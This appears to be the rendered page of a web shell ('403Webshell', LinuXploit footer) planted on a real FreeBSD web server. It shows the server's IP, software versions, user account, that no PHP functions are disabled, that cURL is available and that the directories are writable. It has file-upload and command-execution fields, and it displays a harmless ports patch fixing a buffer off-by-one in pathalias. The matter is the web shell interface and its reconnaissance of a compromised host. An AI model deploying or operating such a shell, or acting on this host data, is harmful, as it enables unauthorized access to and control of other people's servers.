403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/pathalias/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/pathalias/files/patch-local.c
--- local.c.orig	1993-03-03 22:10:02.000000000 +0100
+++ local.c	2013-06-16 18:29:55.000000000 +0200
@@ -1,15 +1,14 @@
 /* pathalias -- by steve bellovin, as told to peter honeyman */
 #ifndef lint
-static char	*sccsid = "@(#)local.c	9.3 91/06/11";
+static const char	*sccsid = "@(#)local.c	9.3 91/06/11";
 #endif /* lint */
 
-#include "config.h"
-
-#include STDIO_H
+#include "def.h"
 
 #ifdef	UNAME
 #include <sys/utsname.h>
 
+
 char	*
 local()
 {
@@ -22,14 +21,17 @@
 
 #else /* !UNAME */
 
+#ifndef GETHOSTNAME
+STATIC int gethostname(char *name, int len);
+#endif /* GETHOSTNAME */
+
 char	*
 local()
 {
 	static char lname[64];
-	extern int gethostname();
 
 	(void) gethostname(lname, (int) sizeof(lname));
-	lname[sizeof(lname)] = 0;
+	lname[sizeof(lname) -1] = 0;
 	return(lname);
 }
 

Youez - 2016 - github.com/yon3zu
LinuXploit